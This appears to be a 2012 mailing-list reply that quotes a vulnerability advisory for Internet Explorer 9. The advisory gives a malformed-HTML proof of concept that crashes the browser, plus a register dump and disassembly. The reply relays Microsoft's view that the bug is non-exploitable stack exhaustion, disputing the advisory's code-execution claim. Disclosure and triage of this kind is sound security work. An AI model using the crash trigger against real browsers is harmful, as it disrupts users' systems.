Jonathan Ness from the Microsoft Security Response Center says this IE9 POC is stack exhaustion, not a stack-based buffer overflow and Stack exhaustion is typically not exploitable for code execution. 2012/12/19 <pereira@xxxxxxxxx>: > ----------------------------------------------------------------------- > Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability > ----------------------------------------------------------------------- > > Author: Jean Pascal Pereira <pereira@xxxxxxxxx> > > Vendor: Microsoft Internet Explorer 9.x and below > > Description: > > The application is prone to a remote stack overflow vulnerability. > > Successful exploitation may lead to arbitrary code execution. > > ---------------------------------------------------------------------- > Proof Of Concept: > ---------------------------------------------------------------------- > > <table></for xmlns="1"> > <td><datetime><colgroup> > <id><dd><col> > </table><object> > <hr><base> > > ---------------------------------------------------------------------- > Register Dump: > ---------------------------------------------------------------------- > > EAX 800706BE > ECX 763FCDB3 RPCRT4.763FCDB3 > EDX 00000000 > EBX 0604393C > ESP 003FDDD4 > EBP 003FDDE0 > ESI 003FDE30 > EDI 761AFA10 ole32.761AFA10 > EIP 7629CF51 ole32.7629CF51 > > ---------------------------------------------------------------------- > Crash Instruction: > ---------------------------------------------------------------------- > > 7629CF36 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] > 7629CF39 24 04 AND AL,4 > 7629CF3B 0FB6C0 MOVZX EAX,AL > 7629CF3E F7D8 NEG EAX > 7629CF40 1BC0 SBB EAX,EAX > 7629CF42 25 0A010180 AND EAX,8001010A > 7629CF47 8901 MOV DWORD PTR DS:[ECX],EAX > 7629CF49 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] > 7629CF4C 50 PUSH EAX > 7629CF4D 53 PUSH EBX > 7629CF4E 8975 D8 MOV DWORD PTR SS:[EBP-28],ESI > 7629CF51 FF70 5C PUSH DWORD PTR DS:[EAX+5C] > > ---------------------------------------------------------------------- > At 0x7629CF51, a read access violation occurs. > ---------------------------------------------------------------------- > > Jean Pascal Pereira <pereira@xxxxxxxxx> || http://www.0xffe4.org > > Copy: http://paste.kde.org/627968/